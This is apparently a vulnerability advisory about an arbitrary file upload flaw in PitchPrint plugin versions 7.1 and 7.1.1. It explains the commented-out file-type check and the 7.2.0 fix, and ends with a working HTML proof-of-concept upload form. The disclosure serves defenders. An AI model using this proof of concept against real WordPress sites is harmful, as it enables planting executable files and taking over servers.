Old Vulnerability Report: Arbitrary File Upload Vulnerability in PitchPrint
One of the things that we recently started doing to better keep track of the plugin vulnerabilities out there is to monitor third party data on hacking attempts. That sometimes leads us to finding what looks to be exploitation of vulnerabilities that a hacker has just discovered in the current version of a plugin. In other cases it shows old vulnerabilities that hackers are still trying to exploit. We have recently spotted an attempt to exploit an arbitrary file upload vulnerability in older versions of the plugin PitchPrint. We couldn’t find a page that clearly described the issue to link to for our data on the vulnerability, so here are the details.
The hacking attempt involved a request sent to the page /wp-content/plugins/pitchprint/uploader/, which would cause the file at /wp-content/plugins/pitchprint/uploader/index.php to be loaded. That will then cause the file /wp-content/plugins/pitchprint/uploader/UploadHandler.php to be loaded and allow a file to be uploaded:
12 13 14 | error_reporting(E_ALL | E_STRICT); require('UploadHandler.php'); $upload_handler = new UploadHandler(); |
In the changelog for version 7.2.0, one of the entries is “Security fixes limiting files that can be uploaded to non-executables”. Looking at the changes made to the file /uploader/UploadHandler.php in that version, you can see that the types of files that could be uploaded were previously unrestricted.
In 7.1.1 the code to check the file type was commented out:
362 363 364 365 | /*if (!preg_match($this->options['accept_file_types'], $file->name)) {
$file->error = $this->get_error_message('accept_file_types');
return false;
}*/ |
In 7.2.0 it has been uncommented:
362 363 364 365 | if (!preg_match($this->options['accept_file_types'], $file>name)) { $file->error = $this->get_error_message('accept_file_types'); return false; } |
The acceptable file types were not defined in 7.1.1:
83 | 'accept_file_types' => '/.+$/i', |
In 7.2.0 they have been restricted to following:
83 | 'accept_file_types' => '/\.(gif|jpe?g|png|svg|psd|tif|tiff|bmp|cdr|ai|eps|pdf|ps|zip|gzip|rar)$/i', |
The upload functionally was added in version 7.1, so the versions that were vulnerable to arbitrary file upload were 7.1 and 7.1.1.
Proof of Concept
The following proof of concept will upload the selected file to the directory /wp-content/plugins/pitchprint/uploader/files/.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-content/plugins/pitchprint/uploader/" method="POST" enctype="multipart/form-data"> <input type="file" name="files" /> <input type="submit" value="Submit" /> </form> </body> </html>